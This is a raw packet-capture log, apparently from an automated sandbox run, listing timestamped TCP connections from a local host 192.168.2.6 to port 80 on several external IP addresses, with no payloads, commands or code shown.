                                                                                                                                                        Dec 5, 2024 05:39:44.070328951 CET4995580192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:44.190079927 CET8049955104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:44.190244913 CET4995580192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:44.201124907 CET4995580192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:44.320991039 CET8049955104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:44.321013927 CET8049955104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:45.708858013 CET4995580192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:45.746464014 CET8049955104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:45.746622086 CET4995580192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:45.747082949 CET8049955104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:45.747132063 CET4995580192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:45.828514099 CET8049955104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:45.828558922 CET4995580192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:46.736491919 CET4996380192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:46.856249094 CET8049963104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:46.856331110 CET4996380192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:46.863574028 CET4996380192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:46.983293056 CET8049963104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:48.442142010 CET8049963104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:48.442178011 CET8049963104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:48.442295074 CET4996380192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:48.443667889 CET8049963104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:48.443717957 CET4996380192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:48.448843002 CET4996380192.168.2.6104.21.31.249
                                                                                                                                                        Dec 5, 2024 05:39:48.568552017 CET8049963104.21.31.249192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:54.076811075 CET4997780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:54.196508884 CET80499773.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:54.196582079 CET4997780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:54.214792013 CET4997780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:54.334491968 CET80499773.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:55.292395115 CET80499773.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:55.294162035 CET4997780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:55.725975990 CET4997780192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:55.846952915 CET80499773.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:56.743345976 CET4998480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:56.863207102 CET80499843.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:56.866076946 CET4998480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:56.877975941 CET4998480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:56.997664928 CET80499843.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:57.961981058 CET80499843.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:57.962028980 CET4998480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:58.379722118 CET4998480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:58.499445915 CET80499843.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:59.398894072 CET4999180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:59.518655062 CET80499913.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:59.522064924 CET4999180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:59.533998013 CET4999180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:39:59.653805017 CET80499913.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:39:59.653840065 CET80499913.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:00.619016886 CET80499913.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:00.619087934 CET4999180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:01.038002968 CET4999180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:01.157735109 CET80499913.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:02.056126118 CET4999980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:02.175956011 CET80499993.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:02.176052094 CET4999980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:02.195569992 CET4999980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:02.315309048 CET80499993.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:03.278789043 CET80499993.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:03.278882980 CET80499993.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:03.279319048 CET4999980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:03.282375097 CET4999980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:03.402038097 CET80499993.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:08.784653902 CET5000580192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:08.904412031 CET8050005162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:08.906119108 CET5000580192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:08.918059111 CET5000580192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:09.037926912 CET8050005162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:10.150129080 CET8050005162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:10.150154114 CET8050005162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:10.150209904 CET5000580192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:10.426589966 CET5000580192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:11.446052074 CET5000680192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:11.565947056 CET8050006162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:11.566163063 CET5000680192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:11.577081919 CET5000680192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:11.696904898 CET8050006162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:12.810494900 CET8050006162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:12.810548067 CET8050006162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:12.810689926 CET5000680192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:13.084225893 CET5000680192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:14.102541924 CET5000880192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:14.222305059 CET8050008162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:14.222383976 CET5000880192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:14.234867096 CET5000880192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:14.354691982 CET8050008162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:14.354707956 CET8050008162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:15.691303015 CET8050008162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:15.691515923 CET8050008162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:15.691616058 CET5000880192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:15.742069006 CET5000880192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:16.757594109 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:16.877460957 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:16.882031918 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:16.892879009 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:17.012635946 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:18.370517015 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:18.370553970 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:18.370662928 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:18.374785900 CET5000980192.168.2.6162.213.249.216
                                                                                                                                                        Dec 5, 2024 05:40:18.494450092 CET8050009162.213.249.216192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:23.868241072 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:23.988081932 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:23.988157988 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:24.001055956 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:24.120820999 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293838978 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293853998 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293864965 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293879986 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293890953 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293900967 CET805001062.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:25.293932915 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:25.294001102 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:25.505599022 CET5001080192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:26.523926973 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:26.643791914 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:26.643867970 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:26.656594992 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:26.776376963 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948327065 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948350906 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948363066 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948398113 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:27.948436975 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948447943 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948460102 CET805001162.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:27.948474884 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:27.948503971 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:28.161062956 CET5001180192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:29.180582047 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:29.300503969 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:29.300633907 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:29.312206984 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:29.431969881 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:29.432007074 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771307945 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771481037 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771492004 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771502018 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771511078 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771518946 CET805001262.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:30.771519899 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:30.771599054 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:30.817368984 CET5001280192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:31.836410046 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:31.956235886 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:31.956341982 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:32.014066935 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:32.134494066 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261049986 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261071920 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261082888 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261148930 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261161089 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261171103 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261243105 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:33.261302948 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:33.261383057 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:33.268186092 CET5001380192.168.2.662.149.128.40
                                                                                                                                                        Dec 5, 2024 05:40:33.387883902 CET805001362.149.128.40192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:38.764486074 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:38.884238005 CET80500143.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:38.888331890 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:38.896495104 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:39.016448021 CET80500143.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:39.986628056 CET80500143.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:39.986732006 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:40.395473957 CET5001480192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:40.515194893 CET80500143.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:41.416214943 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:41.536050081 CET80500153.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:41.536165953 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:41.548202038 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:41.667924881 CET80500153.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:42.635565042 CET80500153.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:42.635659933 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:43.052297115 CET5001580192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:43.172255039 CET80500153.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:44.071489096 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:44.191499949 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:44.191580057 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:44.202023029 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:44.321862936 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:44.321885109 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:45.288722992 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:45.288783073 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:45.708401918 CET5001680192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:45.828094006 CET80500163.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:46.726110935 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:46.845877886 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:46.845958948 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:46.853360891 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:46.973043919 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:47.944267988 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:47.944355965 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:47.944401026 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:47.947345972 CET5001880192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:48.067071915 CET80500183.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:53.566272974 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:53.687287092 CET80500193.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:53.693330050 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:53.702259064 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:53.822031021 CET80500193.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:54.793346882 CET80500193.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:54.793402910 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:55.208344936 CET5001980192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:55.328377962 CET80500193.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:56.226861954 CET5002080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:56.346860886 CET80500203.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:56.346950054 CET5002080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:56.362474918 CET5002080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:56.482274055 CET80500203.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:57.446429968 CET80500203.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:57.448427916 CET5002080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:57.864384890 CET5002080192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:57.984175920 CET80500203.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:58.883630991 CET5002180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:59.003468990 CET80500213.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:59.010283947 CET5002180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:59.018286943 CET5002180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:40:59.138211966 CET80500213.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:40:59.138273001 CET80500213.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:00.248230934 CET80500213.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:00.248281956 CET5002180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:41:00.520600080 CET5002180192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:41:00.640434027 CET80500213.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:01.542294025 CET5002280192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:41:01.662447929 CET80500223.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:01.662544966 CET5002280192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:41:01.670289993 CET5002280192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:41:01.793292999 CET80500223.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:02.765264988 CET80500223.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:02.765680075 CET80500223.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:02.765732050 CET5002280192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:41:02.768615961 CET5002280192.168.2.63.33.130.190
                                                                                                                                                        Dec 5, 2024 05:41:02.888430119 CET80500223.33.130.190192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:08.650919914 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:08.770670891 CET8050023154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:08.770772934 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:08.779948950 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:08.899825096 CET8050023154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:10.286313057 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:10.299947023 CET8050023154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:10.299994946 CET8050023154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:10.300005913 CET8050023154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:10.300005913 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:10.300031900 CET8050023154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:10.300040960 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:10.300043106 CET8050023154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:10.300060034 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:10.300072908 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:10.300139904 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:10.406146049 CET8050023154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:10.406191111 CET5002380192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:11.306379080 CET5002480192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:11.426206112 CET8050024154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:11.430355072 CET5002480192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:11.438410997 CET5002480192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:11.558084965 CET8050024154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:12.942529917 CET5002480192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:12.966068029 CET8050024154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:12.966083050 CET8050024154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:12.966094017 CET8050024154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:12.966105938 CET8050024154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:12.966115952 CET8050024154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:12.966188908 CET5002480192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:12.966188908 CET5002480192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:12.966291904 CET5002480192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:13.062355995 CET8050024154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:13.062454939 CET5002480192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:13.968370914 CET5002580192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:14.088299036 CET8050025154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:14.088407040 CET5002580192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:14.098176003 CET5002580192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:14.217956066 CET8050025154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:14.218079090 CET8050025154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:15.614419937 CET5002580192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:15.734395027 CET8050025154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:15.734467030 CET5002580192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:16.632847071 CET5002680192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:16.752608061 CET8050026154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:16.752753019 CET5002680192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:16.758666039 CET5002680192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:16.878354073 CET8050026154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:18.279335976 CET8050026154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:18.279386997 CET8050026154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:18.279402018 CET8050026154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:18.279464006 CET5002680192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:18.279472113 CET8050026154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:18.279484034 CET8050026154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:18.279525042 CET5002680192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:18.285027027 CET5002680192.168.2.6154.82.100.177
                                                                                                                                                        Dec 5, 2024 05:41:18.404650927 CET8050026154.82.100.177192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:23.702393055 CET5002880192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:23.822166920 CET8050028199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:23.822455883 CET5002880192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:23.831207037 CET5002880192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:23.950933933 CET8050028199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:25.333244085 CET5002880192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:25.494599104 CET8050028199.115.230.222192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:41:26.353740931 CET5002980192.168.2.6199.115.230.222
                                                                                                                                                        Dec 5, 2024 05:41:26.473695040 CET8050029199.115.230.222192.168.2.6
